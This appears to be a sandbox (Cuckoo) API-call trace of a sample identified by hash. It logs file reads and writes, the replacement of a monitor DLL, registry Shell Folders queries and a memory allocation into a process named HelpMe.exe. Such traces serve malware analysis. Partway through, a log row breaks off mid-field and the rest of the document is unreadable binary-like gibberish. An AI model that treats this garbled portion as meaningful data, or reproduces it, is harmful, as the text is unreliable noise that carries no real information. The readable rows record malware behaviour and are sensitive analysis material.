"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->12288"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->12288"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\cuckoo\dll\JWAGXd.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\dll\JWAGXd.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Desktop"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Desktop","dwType->1","lpData->C:\Documents and Settings\janettedoe\Desktop","cbData->90"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->0x0000013c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Generation"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Common Desktop"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Common Desktop","dwType->1","lpData->C:\Documents and Settings\All Users\Desktop","cbData->88"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x000001d4","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Generation"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x00000128","lpSubKey->FileExts"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013c","lpSubKey->."
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013c","lpSubKey->."
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000001d4","lpFileName->C:\cuckoo\dll\JWAGXd.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->47554"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","file6 ,8*.c`}
^zD\TKF|P`UVTGlM{P
0\SgAP
gwoascc
BDEQ\q
RzC? &
DU\fQDE@kBr
AhyQ{t
GKtNKrZZG
yQTRaGHP
^{UIuHg
/Lc{|dku
{ii{k~
amngzss~py#
	e`f7|
YDC[[1S
V]]TEWGGSO
dlr%vd2
C1]6VX]N
BRTXCDAO
aQTm\GZyU[iZo
elt%t``
\)s :h|~wv.i/xw~}{$G
qUQBU]~{r'5<
#[~~G_
gEZEUv]]T
`caogbg
C[W]Kw
2]fDZES
PQUYQXPA
d\P7DVA@5R
f6zq!gkG
kcNWCHJDR^
fTPRh]_S
ba{aiq5
$KES@eY`
FVEEQ@@I
F\Y-TJvA4
HF51vrrej
smj-*w {>
NFcE@gG
DR6**'1(1qIV"
Kyod[\T
`dssqbb
!OESEaWnJ
5@TEOoT
LW!LoG
@2m& rcb
\}QLL[
@R`Q\WIl
jetptcc
EeYdPY]
FJFgTPgLP
IAderwr1e@
Y["Q`M6
aerzud`
\\/QA O5C
G0bsrqd1
OF])TM
disionca'%3(2:;=+(
/bd[\T
LbW\V]PcD$L
G1RW`AR
O4XXCQp
2g 'p1b
UCICDU	
	+CAG~k
:6'6O|CPXK
_x[YQSPcDsMLG_v	b
Q3LQDMc
". ~mqUQVIO8'
_~EYSTDaRqOVIQe[oPEV
IAEUV]D
qyauucq
UCICDU	
kW$.gu}
cojkbgJjK
~KR3UI
(&XL@SVV[oPAY^WldVEE@
90 <tMNWIg
nmqqiq7
Z\@cER{
Z]VTSQ
JiI[Eu-2hgo;|qccuc;fmcvN\t
}MxxAW`PMX
DENTBNEVIOPIE-
(a'- }@Kazy
]@cFTy]W
gMJVCSBGpoQT@_EVQ
:'@CESWA5\@
pXZSbQMP2
ps,-ckv
\EjK]TyWOI
	)V2ZI
6$dENGbC
ES[__l
XNph;1
aUCOYTVaQSXe]M\PPdCXJ
[P^VTV
WCXGwX[Su
P62*01!*
WaEUBHg
0'7"!rl~J
V^[pIC6#
7XS*.7
N}YWP{T@
	`^VDDW@]r~\WPCQ[TD~{KVS]GEet
Z_ke\A
a0"u|`j
ZBUWYCDDK
%Ipq;41*+4
CBFNIPJFo[
_EbC@WQ|QOI
dWB@PT
aRPR R
SV_EAJ@
N@1VQ5
WCOePZG
0e&q!`j
/Ywqstjc
GG^U\e
S_}SL}Ao@NA`c'%wbe
\-ygu}}~twnso3&/ =1PU
* 7< MJVl/Y^T_GCDzvpa
.7*6#!
6%1!.$''lH(
\AjEUxTI
e]^ZDWFGpo]QBM_M^Cng_WS	F@oz
cTEEPZ
MAdTQg@]KA4
ww{)4d|
^_aqubj
CTEuXV
@PG:hC
cSQzH\V)
efruw62
y|s{sn=&&%,93:jel
H{+8DXU2'&
:0PCQMJV4
ThxaSSY\`VGY
	W]P	\
UK_VCH
&*<)	GZG
d\WDGRDWdcZUFM_MRFluEL\XECjzB
CV]M5V
CSQ\KMJ
}AS]zSK 
d6s&w7`
DM<9<{sn
("0GiZ;R
[_VGA~+>
HPD;_^DB_\7QVpa
2oYV6-
qJgGIU
3ZP]TDZDcJAU
@BMZADPY^YXMV
woau+c
]D~CAGEuM
]@cASzSW
eMJVFUJGpo
	FVQMm1ZY
XE`SGKPW
	@TDodEW
AeQVU[Cv
VKJA;hG
EKVM[D[LEXUFYMB
dFHD7`rtsjfA
FVQK_VCM
jm" sbe
SO[bG^Q^_VZ
!(PWWXJDEJ
aSUw^VX
qmtquej
Z|s n=-w&"{o|ut*
W@CC^Gj}YA^M
FCU!9$$
G' 3aHYq
PwVTTK
RFJFGTP_JA
aQ]AR'N5
g`"&q2dC
GZG?wNIgac
jgg?j/)vx{f|'p
XUA^E]
\VzGCB^YLpU
`UVhERAHfQ_CW}Vd
]H]{_VxR
~xq.71v
[zSKH_
^WIlP\R
5GZG>Gj[WWBHoQ[FTuHd
(SHsNb
17 ps75
+}'<mncap}h{coj;+"K_V
2~aK%3&?:41~{KLHM
8E7ybs
BBU^Df
BPc}zn]W}\FR_B
	W]P	\
UK_VCH
KNP'30
w~gqyaaiq;iI[
+LS6hj
(	@xmnWFTU
PSWYQXP
2PUt'-<)
*:lro5qsxy~tF
DyVpBSmiQPVUrEUPWJ]
~GV~GSLgG
>QXP?cen
7"m\GLgG
c`}}9sxy~u
*?+;.1$
"-*+ +6~aK
PbyMTDmk@T
NG@GKKBEEO
2GUg*2EcR6;
>qy|ebtF
wHTZECZ^^
|FFQA]EhD
CQUF|MY\dJ^M
kUPbDUBMgPZ[QvNu
ryk`w4pAJ
JKT_GV^[
pIEwGW^}\N#Id
Au%-*1gt
Z/QAH	**}<<{
ru{={#z|
gMJVAQBGpr
|ztoqx|uc`}|u{jel#
ODYIdLS-VNL
jaYZ\[P]
	A^PGma[
]JD@GA
|MMFt^PBWKN1
j6p'!57
%^\TzV
EWGGSO
D`b"s j7
@NA_F"
^TxR\S
YTPM[P
^G_RG[_VQ_
aJRSDS
A`1'%!fb
GvXXR,W
hiO9d(g$n
FAtUQEP
r($*	;+1> <
asub1cs
[CwY\Q
XV_JCAQ
cwoa#:?G_[C
;GbC>0n}
&r/w1-v=cquf
/nUvUBPBRWpSSQBB
svxg~krkjgmfD8iD
eesaiq5K@GQUQ
QDUvY\
6.'6!mJ`I
UCd_bT
YEu_NhDC_U
oRES_^^jJX_jMZHRsu
ODQNs\B
sd|{fj'#'
rQ	R@M
66tstgd@
	QL	QJST
LJSs\_Su/&
aerzud`
?YG\Uru
Zt|w&d+&mpicu
eil#;%&,.!=1(
!(pWQU
`cq{k`k
*@\USKz
}	RS-Y
bcuv}jk@NA
ICZIuP[
u*x),|dc
TY]\CN@EU]
o\ZLQdENQ
w{twce
RX]S]M@BGA
D`b"s j7
	\[@NA_F"
^TxR\S
oi~3u9A
NGVUhGBXESFmA
^G41+(pea
!(JtY]\
BlA_RG^m^uKDSJc	cVR]N
\S[ZJ@
S]w_]YQ 
jb s a7
aC[VId
 ZId:9&n{
#K@GANq
_{A]RUPcD&
	1BiD\AV
S_wNaeASDXV^cJAU
bTUS$_
f4&w$d2
XlYOSQJmJ`
C6a"t$a0F
ZVY\UCHB@GA
Z}CONGC{^`UV
F7	bK^MTK
C6a"t$a0F
ZVY\UCI
Z}CONGC{^`UV
F7	g\V]
\r_XPCI
2b"q&7f@
\UCICETY
]u_Nh'
X`A^TG^mWvAVIQ2Z4
]r_XPCI
2b"q&7f@
\UCICD
*Dn['00
]u_Nh'
X`A^TG^mWvAVIQ2Z1
2g 'p1b
XvK@GKW\
CICDU\
mJ`*!&0
CCVVDmJ`H@]QxM1G
0\URr\
2g 'p1b
XvK@GKW\
CICDU]@
CCVVDmJ`H@]QxM4P
\QWW]_
NCEQZ@
@nF_@P'
01v!tgg
M{PKXGEx_YP
^zD\TKF|P`UVTGlM{P
01v!tgg
@jGMF('
:16 vCpGMFEx_YP
^zD\TKF|P`UVTGlM~G
OFf7rwqq
fC]VId
<'6QxMu^K
_~EYSTDaRqOVIQe[oPEV
OFf7rwqq
+WA@6'
*'G_vM~G	"DRS
_~EYSTDaRqOVIQe[jGMFK
@bawaiqe
gBXEQdEN
lYO101
*VIQvCu
Y}D]RQC~PlMGSQxMfFQVI
IAQY]QD
@bawaiqe
~K@GLbW>7&1
[XGQxM:#
Y}D]RQC~PlMGSQxMcQYF
gwoascc
gBYDTw]NI
Bl&8!&7
5`UVG_v
W~B^SUB{WsOZQ@bM{PX@]
gwoascc
Dn[VIQ<);	
W~B^SUB{WsOZQ@bM~GPP
@GBQXCI
/BYDUvX]Q
6.'6!mJ`[XG
VvHES]`\aPEVT
*UQTvY\
6(16PcD`UV
VvHES]`\dGMF
eesaiq5K@GQUQ
DUvY\T
0>1G^mDn[
!(L|E\[UE|WrI@TBbAcA_VI
eesaiq5K@GQUQ
&>@IPmJ`
!(L|E\[UE|WrI@TBbAfVWF
cwoa#:?G_[QXG
dEN2_WD
&ONGPcD*?
cDW_RTK
QqHDUGe^a\]GS
@_]ZQF
cwoa#:?G_[QXG
dEN7H_T>Y\U
1maog=
WA@G^m
^j_*UQT
cDW_RTK
QqHDUGe^dKUW
X@QdENS
w%*)6 [_VGA
bdwaiq=lYO@IP' +
Xlxg@WB~_rNGTCd[fC_ZQ
0TUPdENS
w%*)6 [_VGA
qLbWONG
Y[C,_bUQT
Xlxg@WB~_rNGTCd[cTWJ
WUPVPP
@fF]VId_\U
5</&6* VIO
cerrqq
d_gBYE
[}COooP}Vs@DR@e_gFXES
fQCHd_\U
5</&6* VIO
cess'kq
Cd_bUP
[}COooP}Vs@DR@e_bQPU
cPEVSvYNI
JK?00:6'6O
cesstbg
UCd_gC
X{@^TG
EDpIE\Cc\fBY@T
pICRvYNI
JK?00:6'6O
Zcessuc1
DUCd_c
X{@^TG
EDpIE\Cc\cUQP
{P_DUdEN
K@G ,07 >q
+essucb
_qV:IDUCd^2BKXGCpFXS\CmkH[FUBm_`AXDU
_	QQZP
pSQTdEN
K@G ,07 >q
pGMF./
c-ssucc
rIDUCe
fGMFCpCXWVDmkH[FUBm_eVPT
u_@[jK
$[_V68aog
!KXGdEN	RiZ:&7*+4
K@GlMO
kW/_qX
,PsOBPKmW5
XB~G[dQ[W~WTRK
G2czp|d0
Z\@qTTB
vY]PzQ]U
<.*hfsv
w=~ubyrobuch
kfr@_E\SC
~GWTvK@GDEN6&:016>
+essucc@
_qV:IDUCd^6
P|CU@hxmTrHMUDg^bUUU
a^GWDUdEN
>NIQ*&7&(q
:NIlCAGEx*V9K
GW*DTZ
yWtOA]Jl
FCvUQEP]SsSU\D
t|-v6-%;gtvr
ZTEOFL\U@NAaS
64uzvjdA
gasaHYq
]DdENQ|QOI
lwlc)tkvzMq%0DH
[$r~tf~!i0|ur
W]TG_[
GR'Y	\F
k4 utee
A^+G	Q\K,P 
FG_v^fE_VI
X_]QGIQyoO
zBRREUvZZWo
gwoaqac
8um1x'9}&Muqe
eilsbyasp#((E
Y41+(pea
cdzsr`b
B*_&HM]
7YcSWQ
rQ	R5C
G0bsrqd1
w]XGbC[U
p~H5<,#</
P\Au^K
6 &6 ~
kglip!
wu~uc,s}{p'
0OooP}Vs@DR@e_gFXES
XWQkCaY^DPCNDEN6&:016>
me;succ
B_\s_U
Z^~A	RUBwDn[
Yz_rEUPWJ}]KQ
!BVWQE1_
@]Dv[XGEbUVYP
`FKXG*
G^N2%3&!~m
XvY\G 4
_x[YQSPcDsMLG_v	b
01v!tgg
VX]UQUQ
Hx50K~aM&;7
*:=VaCLME
4K@GIIt
CYBUTp
SG_QCp4967;
<'G~^MeBXMU
ZXvY\U
TGy^&_LXP
_qV:IDS
d_gJKXGAN{XzWklG@
_}LnWRTUP
E~BB{@
@X-L@tAS
PBG HRU
$ P@CR\G
QiWQ[^VlS_]l_B[Rqc
&TB]AIkYs_LXP	
NIQ*&7&(q
*aCLV^M
.IR\$_F^Z&,MTN@
Y|DDrFPT]\gXNG
IA[@~BR
VYXTBO]@V[
rF]CXG \
b3pt$c6
q_=ULPRX
[EBMCT
gmfqXIawcb
di}nmscke#
gll0v6FJFYAdC[~
?zYRFX
EbQP_KY^lgTR
t5/5apt<96. q^(
R^zQN'N5
g`"&q2dC
(4qs&7e
vTEZCSV$
]w |!apz<d'$v
ATWY@B@A
fGKsAWB[zCTBWuNn
`fz v77DH
WXZKGJEVIO
d4s&|7b
 []S}P[WH_u
E>KUKXKV_XDG
z{gu}{b`bswc9d`vkA
7@S|S@
j5PZR[B
CG]MB~sH@NCP
KBV0@9"$&
^_aqubj
NArQNIl
]\K=MQXB_RVVJ
UAwTE[
!:`gmf
qgbg ,$6$&;-g
A\^|VHuHd
dYCMEV_p\\[RtN
ewoatgk
#JTpZ]S
[)SUCtRMU
GQWYCV^[F[q;
|KSGLeWNYG#
N@M047**=
V]aBMXG
sGcoPSDXV^
DENTBNEVIODEN7
a!0"7 
K=)BKXEd[YLyGC\QV\B
TGwSAQ\QVuAOGGA
mvle{rcmr5
WBO@ES_GM
0c!&wq
*u^KVI
VrTB]SG 4
VOg[q[LXP[^sMHG
-[sBP_P
QL	QJST
\@mYV$
T~K@GLcW'
6%#6!qEXG
\A'IVIQ<+
UBf_4]YP
fCB@T]
uCXCSdEN
GZK00aog
6TEAGeM+)
cesst7g
d_gBYET
PCyMNeLFB^UsXWT
\ReLzBTVSK
Xp[!LT
qN\`[XG
XRWQRSVP]
rK@G /
(LPWVQF
/nUvUBPBRWpSSVEA
uf`pe`afuq
bbuaiq7GZKAI
D]U1_s_^DC
<!777mJ`[XG
T@z^s_]B@WBw]PG
A{AVnWPVUP
K)0n}u+c
PdEN	]|I
UCbUDD
]SWB)^zMVIQ8
	LNFTP
NGTK@GBHDBGA
dEN3K^V&4/
)?<AiZ
GNuZhLK^U
xR_A}U
XRmFP@UQ_
VDX[Y6O
@WXdPCVSSD
Y\UCICDQO/&
eBXMUqZ]U
bcmwqeq
TTDySz@L
DEN]DKCB\ZD
elv |a7
~Rv[XGEd_pIC
DRSBMGDG`(
bTXTqZ]U
bcmwqeq
TTDySz@L
JKTRAIEMR
f6zq!gkG
TF{Dn[BUCvCu
^GEEQY
/]P[DT
gdrukgg
D~PtLL\K6
DQ[WCOJC
f6zq!gkG
TF{Dn[BUCvCp
HMOB@Q]
!(pWQU
gdrukgg
D~PtLL\K6
^^^UE@D
Ajg'w}6d@M
\VQPcDtIDG_v	>
cVWvXUU
cewrte}
,PsOBPKmW5
Q[\SJN
Ajg'w}6d@M
\VQPcDtIDG_v	;	
_oCVvXUU
cewrte}
,PsOBPKmW0
ATq_UPA
7a{&r12
AY@IPyVr[XG
cBKyod[\T
`dssqbb
!OESEaWnJ
TUq_UPA
7a{&r12
AY@IPyVr[XG
bGlnd[\T
`dssqbb
!OESEaWk]
^FHD3GXCS
k0t!$k6A
ZzWA@SB
fF]DGKcNW
cbprucg
SBbYbJPL
V	FJFgTVR
k0t!$k6A
ZzWA@SB
fQQFKcNW
cbprucg
SBbYg]X\O\U
fE_MP%P^
Gd7"{ 0d
LbW[RUPcD$
iDX@QvKao
blstvbc
b^aD\L\
eSXQ%P^
Gd7"{ 0d
LbW[RUPcD$
dTUPvKao
blstvbc
b^dST\
@2m& rcb
LxE]@IP)
:PEV2_WBTr]\G/&
aerzud`
@2m& rcb
LxE]@IP)
[WUr]\G/&
aerzud`
rQ	R@M
66tstgd@
	QL	QJST
Y[pXXQ
/Ywqstjc
OD[wBTS
VRA><FT
rQ	R@M
66tstgd@
	QL	QJST
LZpXXQ
/Ywqstjc
OD[wBTS
IAderwr1e@
qXIawcb
(@TU\C)Uu
IAderwr1e@
qXIawcb
(@TU\C)Uu
FHDB\XA
bat!s1j
geaNOqa
W\EvW$JC
C1V3CPL
PBNEMP
bat!s1j
geaNOqa
W\EvW$JC
C1V6TX\L]
YTDOJA
d7u!|ge
bawsg^Y
VD5_2K
\]RE@F
d7u!|ge
bawsg^Y
VD5_7\
gcwv$6gC
OF]$XXQ
u^K'0n}sbg
AU@IP)S!
A\Dm^1A^
bTUS$_
f4&w$d2
0"'hme
/bd[\T
LbW\V]PcD$L
C6a"t$a0F
ZVY\UCHB
